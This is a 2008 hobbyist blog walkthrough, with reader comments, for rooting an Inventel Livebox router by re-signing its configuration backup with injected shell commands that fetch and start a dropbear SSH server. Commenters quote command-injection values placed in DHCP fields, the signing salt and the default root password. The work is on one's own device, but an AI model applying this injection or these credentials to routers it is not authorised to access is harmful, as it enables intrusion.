got root ?
Thanks to xtof and Andy Potter, here’s a walkthrough to install the dropbear ssh server on the inventel livebox.
You just need a *nix box with a webserver, connected to the livebox via ethernet.
It was tested on v5.10.7-fr and should not brick your livebox, but use at your own risk.
First, we must drop some files on our local webserver for the livebox to download later.
sudo wget http://www.andyp.uwclub.net/dropbearmulti
sudo wget http://www.andyp.uwclub.net/dropbear_server
#we change the dropbear executable location as we can’t write to /bin on the livebox
sudo sed -i -e s#/bin/drop#/etc/mystuff/drop# dropbear_server
Then we download the cfgsave.dwb file from the livebox in some folder and go there.
wget http://www.agp.dsl.pipex.com/files/cfg_unhide.c
wget http://www.agp.dsl.pipex.com/files/cfg_hide.c
gcc cfg_unhide.c -o unhide
gcc cfg_hide.c -o hide
#we extract the cfgsave.dwb contents
dd if=cfgsave.dwb bs=36 skip=1 | ./unhide | tar -x
wget http://jean.thecoderblogs.com/files/2008/12/dropbear.txt
Now open dropbear.txt in your favorite text editor and set the MYIP variable to the ip address of your webserver. This script will be run by your livebox so double check it before moving on.
sudo chown -R root:root etc usr
tar -c etc/* usr/* > cfgsave.tar
echo AVfqQReAOR1KYw== | base64 -d > md5salt
(cat cfgsave.tar md5salt | md5sum -t && cat cfgsave.tar) | ./hide > new.dwb
Now, you can upload the new.dwb file on your livebox. While the livebox reboots, you can check that it runs your modified bluedsl.conf by looking at your webserver log.
tail -F /var/log/apache2/access.log
When the livebox has successfully downloaded dropbearmulti and dropbear_server,wait a bit while the DSS and RSA keys are generated and then just go :
ssh root@configuration.adsl
Dropbear will be started automatically at each boot, so you can restore your original cfgsave.dwb file.
Enjoy !
December 13th, 2008 at 5:04 pm
Hi !
I have tried to apply this walkthrough but got stuck when uploading the file back to the box (”Incorrect configuration file”).
Is there a tricky with the md5salt file when generating the new dwb file ?
Anywhere thanks for the good work !
Regards
Marc
December 13th, 2008 at 5:43 pm
are you using cygwin ?
anyway, can you check that the md5salt file is 10 bytes long (wc -c md5salt) and then try this command instead to generate the new.dwb :
(cat cfgsave.tar md5salt | md5sum -t && cat cfgsave.tar) | ./hide > new.dwb
December 14th, 2008 at 9:00 pm
Glad to see progress on getting root access to a standard firmware.
I’m currently still trying to get the latest source code from Thomson/Orange but its proving difficult. Until we can compile our own, this is the best way to go.
My old web site (www.agp.dsl.pipex.com) could disappear at any day but the uwclub.net one should be around for a bit longer.
December 18th, 2008 at 3:29 pm
I have tried this on my spanish v5.10.3-sp which is current spanish version and didn’t work.
The system recogniced the new config and wrote it without problems, in fact I downloaded the config file again and the modified bluedsl.conf was there, but it seems it didn’t do a thing on boot.
Any idea on what I can take a look at?
Thanks in advance.
December 18th, 2008 at 6:40 pm
As I saw that the script is not being run I did some tests and got weird results, they are parsing the parameters in a weird way, having this on the config:
DHCP_START=”;wget 192.168.0.2″
DHCP_STOP=$(cat /etc/firm.conf)
and got this on the web:
Dirección inicial del servidor DHCP ;wget 192.168.0.$(cat /etc/firm.192.168.0.1
Dirección final del servidor DHCP $(cat /etc/firm.192.168.0.1
Weird thing is where does that 192.168.0.1 come from (that is my livebox’s address) and that the start address includes part of the string from the stop address.
But it doesn’t seem to execute anything.
Ideas?
December 18th, 2008 at 9:24 pm
do you have a decrypted copy of your current firmware ?
i’m short on ideas, but here’s what i found out so far on the subject:
the readconf function parses the .conf files like this:
eval “$VAR=’$( conf_get_str $RCONFFILE $VAR )’”
conf_get_str is a program (not a shell script) whose purpose is to unescape the variables values (not sure on the details).
conf_get_nstr is the same binary, but when run by that name, it does an additional “anti-injection” regex check on “([^;]*);([^;]*)” but i havent figured out yet what it does in case of match.
December 19th, 2008 at 11:51 pm
If by decrypted you mean a firmware split with dwbtool into the install_script and the cramfs_image, nope, what I have is 5.08.3-sp (came on the cd) and dwbtool is not able to open it, so I don’t know what to look at.
It really seems weird to me that v5.10.7-fr is supposed to be more advanced than my v5.10.3-sp, so it doesn’t make sense that -fr (newer) is vulnerable while -sp (older) isn’t.
I think I may be able to get an older firmware (maybe supported by dwbtool), but don’t know if this would help at all or how could it help.
December 20th, 2008 at 12:35 am
I got an old 5.03.2-sp from the web of a guy and could get the cramfs out of it. In that version things seem to be like you say. After seing that code I still can’t understand how can it work for you with the -fr, I mean… how can eval “$VAR=’$( conf_get_str $RCONFFILE $VAR )’” execute the code you append to the config file
Could you explain this to me?
January 20th, 2009 at 5:07 pm
Where can I get the v5.10.7-fr firmware? Can somebody send it? (you can use http://drop.io for example) Does this firmware exists in UK version?
January 22nd, 2009 at 9:31 pm
Thanks to Andy I’m running now v5.08.15-2-fr. Now I’m trying to use this method for ssh access but all I get is the error “incorrect configuration file” trying to upload the hacked configuration file.
In my firmware the files in the cfg file are not in the etc/ and usr/ directories like in your firmware I changed this and the files are the same in the hacked cfg. But, it seems my firmware must be using a different salt for the heading of the file.
How can I find this salt (like AVfqQReAOR1KYw== in your firmware) ? If it helps I can send you he websvr binary. A quick strings to this binary shows this:
md5sum > /var/tmp/cfgsave.dwb.md5sum
/var/tmp/cfgsave.tar
/var/tmp/cfgsave.dwb.md5sum
/var/tmp/cfgsave.dwb
Erreur, impossible d’ouvrir md5sum
Erreur, impossible de lire la signature qui vient d’etre ecrite
tar -c -f /var/tmp/cfgsave.tar -C /etc adsld.conf adv_firewall.conf bluedsl.conf dyndns.conf port_forward.conf sec_level.conf tdte.conf udhcpd.conf vc.conf wifi.conf issue.bluedsl hotspotupLoadCfg
January 22nd, 2009 at 10:43 pm
@blue
i really don’t know, sorry
@Ernest
the cfgsave.dwb file is generated like this
http://jean.pastebin.com/f6a47e9af
so you can’t find the salt by looking at the strings
(the base64 string is just a fancy way to generate the signature in one shell command without non ascii caracters). i’ll try to look at your websrv binary to see if it’s different.
January 23rd, 2009 at 6:55 pm
Thanks for your answer Jean. I’ve finally succeded hacking the cfgsave.dwb file, the problem was I was not including the “issue.bluedsl” file that contains the firmware version.
I’ve downloaded again the cfgsave.dwb from the web admin and the hack is there but it’s not executing. Looking at my firmware (v5.08.15-2-fr) it seems the bluedsl.conf file is not executed:
# grep ‘^\..*\.conf’ loop/etc_ro_fs/rc*/* | grep -v autoconf
# grep ‘^\..*\.conf’ loop2/etc_ro_fs/rc*/* | grep -v autoconf
loop2/etc_ro_fs/rc2.d/K50mdg:. /usr/etc/mdg.conf
loop2/etc_ro_fs/rc3.d/K50mdg:. /usr/etc/mdg.conf
It seems the only executed file is /usr/etc/mdg.conf but it’s not included in te cfgsave.dwb file, too bad
I wonder how this worked in your livebox, it’s an Inventel Livebox or a Livebox pro?
Any ideas about how to get telnet/ssh access to this firmware (without a serial cable)?
January 27th, 2009 at 2:26 pm
Does anyone have a copy of v5.10.7-fr.dwb or v5.10.7-en.dwb or anything later than 5.08.15 ? I am trying to help a couple of people upgrade from v5.08.15-2 to v5.10.7 or so but need the firmware in a dwb file as they do not have JTAG or serial access to the Livebox.
February 6th, 2009 at 4:25 pm
Hi,
thanks for the great work,
i live in Morocco and i bought 2 dwb200 routers and a inventel livebox from a flea market; one dwb200 is from Wanadoo-Spain and is working great, the other dwb200 is from Wanadoo-France and when i plug on the line it says “synchronizing…” but nothing after a long time, same thing for the livebox!!!
please is there a bricked firmware to upload or do i have to install linux to do all the steps to unlock the machines?
thanks
February 9th, 2009 at 12:20 am
Hello
Thank you for that just i have problem when i run :
lardet@lardet-desktop:~/lbox$ dd if=cfgsave.dwb bs=36 skip=1 | ./unhide | tar -x
I have this message :
412+1 enregistrements lus
412+1 enregistrements écrits
14848 octets (15 kB) copiés, 0,00499317 s, 3,0 MB/s
tar: etc/udhcpd.conf : l’horodatage 1970-01-01 01:00:00 est trop vieux pour être plausible
tar: etc/dyndns.conf : l’horodatage 1970-01-01 01:00:00 est trop vieux pour être plausible
Do you know if it’s a problem i don’t understand my new.dwb size is :
20,0 Kio (20516 octets)
Thanks
February 9th, 2009 at 9:23 am
@Hadoo, you can find some firmwares a these websites:
http://dbzoo.com/wiki/livebox/livebox
http://gpl-inside.wikia.com/wiki/LiveBox
February 9th, 2009 at 9:57 pm
@Mickael there’s nothing wrong with “1970-01-01 01:00:00″ and the new dwb is larger because we add some shell commands
February 11th, 2009 at 7:21 pm
Ok it’s just i would’nt brock my livebox
And just the files size is little with a complet firmware i thinking beford the livebox save config and firmware on the same *.dwb .
Thanks i try to flash my livebox with ubuntu
February 15th, 2009 at 5:53 pm
Ok great ! Just i can connect with Putty on Windows and with Konsol on Linux but with WinSCP(Windows) i just can connect with error 127 SCP but no SCTP , Filezilla and SmartFTP won’t connect on Linux gFTP not connect .
Do you know graphique software for connect or i think i don’t use correctly the software .
Please if it’s possible Putty work great but i prefer grafic software
Thanks
February 15th, 2009 at 9:33 pm
dropbear (the ssh server) does not support sftp by itself, and for scp you need the scp binary on the livebox. i’ll post the scp binary once i manage to recompile it. thanks for your feedback.
February 26th, 2009 at 10:16 pm
Bonjour,
L’ensemble des étapes se sont bien déroulées. J’ai pu voir le téléchargement des deux fichiers s’opérer, signe que la procédure à été jusqu’au bout.
Cependant, j’obtiens malgré tout un refus de connexion de la part de ssh lorsque je tente de me connecter à la box.
Sauriez vous ce qui peut clocher ?
Merci d’avance.
February 27th, 2009 at 12:54 pm
danifty
You are on Linux or Windows ?
If you are on linux you open terminal and write :
ssh root@configuration.adsl
or
ssh root@192.168.1.1
Password : livebox
On Windows use Putty :
Host name or IP :
configuration.adsl
or
192.168.1.1
Port : 22
SSH
Open
Login as : root
Password : livebox
Quel refus de la par de SSH ? Une erreur ?
Plus d’info et pour la langue française tu peu aller ici :
http://www.livebox.asso.fr/forum/viewtopic.php?f=12&t=17775
February 27th, 2009 at 9:07 pm
@danifty
je sais pas trop, si les 2 fichiers ont été téléchargés et si dans dropbear_server le chemin est bon (/etc/mystuff/dropbear au lieu de /bin/dropbear) ca aurait du demarrer.
je vais essayer de faire une méthode plus simple et qui permette de voir la sortie des commandes shell injectées
February 28th, 2009 at 12:07 am
Je ne savais pas que le français était possible cela m’arrange
Pour la methode si l’on est sous Linux c’est très facile enfin pour ce que je connais faire une petite recherche pour installer le server faire un essais pour voir si les fichiers apparaissent trouver l’IP du PC etc.
Sous Ubuntu enfin avec une interface Gnome c’est très simple sous KDE que je préférai avant moins . Sous Windows je n’y suis pas arrivé m^me en emulant linux .
Bref TUTO sous Linux très bien même si l’installation du server n’est pas expliqué car je pense celui qui fait ce genre de manipe est capable d’aller chercher ces infos
… ce que j’ai fait (PS j’ai mis du temp a trouver que l’adresse IP du PC était celle de mon PC )
J’ai lu pour le SCP sur Dropbear que c’est pour le moment qu’en développement car il y a des bugs et difficile a faire enfin a priori je laisse le soin au pros pour cela
Escuser moi pour le français mais deja c’est pas mon fort alors l’anglais
Merci pour ce blog jean .